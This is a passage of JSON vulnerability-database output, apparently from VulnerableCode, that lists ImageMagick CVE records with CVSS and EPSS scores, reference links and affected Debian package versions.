"vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-14981" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gc9p-4vdm-rbah" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81957?format=api", "vulnerability_id": "VCID-gf8v-mmd7-hqag", "summary": "ImageMagick: outside the range of representable values of type 'unsigned int' at coders/bmp.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27772.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27772.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27772", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24834", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24914", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24954", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24729", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24841", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24855", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24816", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24759", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.2477", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24762", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24678", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27772" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27772", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27772" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898291", "reference_id": "1898291", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898291" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27772" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gf8v-mmd7-hqag" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82008?format=api", "vulnerability_id": "VCID-gp36-v664-vuh2", "summary": "ImageMagick: outside the range of representable values of type 'unsigned long long' at coders/txt.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27758.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27758.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27758", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24834", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24914", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24954", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24729", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24841", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24855", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24816", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24759", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.2477", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24762", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24678", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27758" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27758", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27758" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894236", "reference_id": "1894236", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894236" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27758" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gp36-v664-vuh2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82013?format=api", "vulnerability_id": "VCID-h7em-v8x6-63e3", "summary": "ImageMagick: heap-based buffer overflow in PopShortPixel in MagickCore/quantum-private.h", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25664.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25664.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25664", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.20438", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.2056", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.20558", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00067", "scoring_system": "epss", "scoring_elements": "0.20553", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.25129", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24973", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.25018", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.25032", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24991", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24937", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.25014", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24904", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.25091", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25664" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25664", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25664" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891605", "reference_id": "1891605", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891605" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-25664" ], "risk_score": 2.8, "exploitability": "0.5", "weighted_severity": "5.5", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h7em-v8x6-63e3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80666?format=api", "vulnerability_id": "VCID-hrrw-ufje-akg5", "summary": "ImageMagick: processing crafted file leads to division by zero", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20176.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20176.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20176", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32409", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32559", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32595", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0013", "scoring_system": 